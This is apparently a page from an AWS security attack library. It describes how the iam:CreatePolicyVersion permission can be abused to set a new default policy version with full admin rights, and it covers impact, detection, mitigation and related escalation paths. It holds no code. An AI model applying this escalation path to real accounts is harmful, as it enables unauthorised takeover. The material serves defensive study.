Not affiliated with AWS
← Back to Attack Library

Create IAM Policy Version

critical

Privilege Escalation

An attacker with iam:CreatePolicyVersion can create a new version of an existing managed policy with admin permissions and set it as the default.

Required Permissions

iam:CreatePolicyVersion

Description

This technique exploits the iam:CreatePolicyVersion permission to overwrite an existing managed policy with one that grants full administrative access.

When a user has iam:CreatePolicyVersion on a policy attached to their own user or a role they can assume, they can create a new policy version with any permissions they want — including AdministratorAccess — and set it as the default version.

This is one of the most direct privilege escalation paths in AWS because it requires only a single permission and takes effect immediately.

Impact

Full administrative access to the AWS account. The attacker can modify any resource, create new users, and access all data.

Detection

Monitor CloudTrail for CreatePolicyVersion API calls, especially those that set IsDefaultVersion to true. Alert on policy documents containing Action: * or Resource: *.

Mitigation

Avoid granting iam:CreatePolicyVersion unless absolutely necessary. Use SCPs to deny policy modification. Apply permission boundaries to limit the maximum effective permissions.

Related Techniques

Attach Admin Policy

An attacker with iam:AttachUserPolicy or iam:AttachRolePolicy can attach the AdministratorAccess managed policy to their own identity.

Put Inline Role Policy

An attacker with iam:PutRolePolicy can add an inline policy with admin permissions to any role they can assume.